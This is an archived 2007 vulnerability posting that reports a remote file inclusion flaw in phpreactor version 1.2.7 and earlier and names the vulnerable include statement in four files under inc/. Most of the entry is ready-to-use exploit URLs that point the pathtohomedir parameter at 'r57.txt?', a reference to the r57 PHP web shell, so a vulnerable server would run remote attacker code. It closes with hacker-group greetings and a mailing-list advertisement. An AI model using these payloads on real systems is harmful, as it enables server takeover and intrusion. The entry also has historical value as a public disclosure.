Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17151
HistoryJun 01, 2007 - 12:00 a.m.

phpreactor <===1.2.7 remote file include

2007-06-0100:00:00
vulners.com
33

*phpreactor <===1.2.7 remote file include
*
*url:http://sourceforge.net/projects/phpreactor/
*
*author:titanichacker (egy-virus)
*
*contact: hack-teach.com & mohandko.com & tryag.com
*
*bug in :
*

  • /inc/view.inc.php & inc/users.inc.php & inc/updatecms.inc.php &
    inc/polls.inc.php
  • include($pathtohomedir."/inc/cms.inc.php");

*exp===>
*
*http://localhost/phpreactor/inc/view.inc.php?pathtohomedir=r57.txt?
*
*http://localhost/phpreactor/inc/users.inc.php?pathtohomedir=r57.txt?
*
*http://localhost/phpreactor/inc/updatecms.inc.php?pathtohomedir=r57.txt?
*
*http://localhost/phpreactor/inc/polls.inc.php?pathtohomedir=r57.txt?
*
*and more
*

  • thanx
  •      cold-zero &amp; mohandko &amp; tryag &amp; xp10 &amp; drbaka &amp; arb-hawk &amp; kof2002 
    

& ilw0rm
*



Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/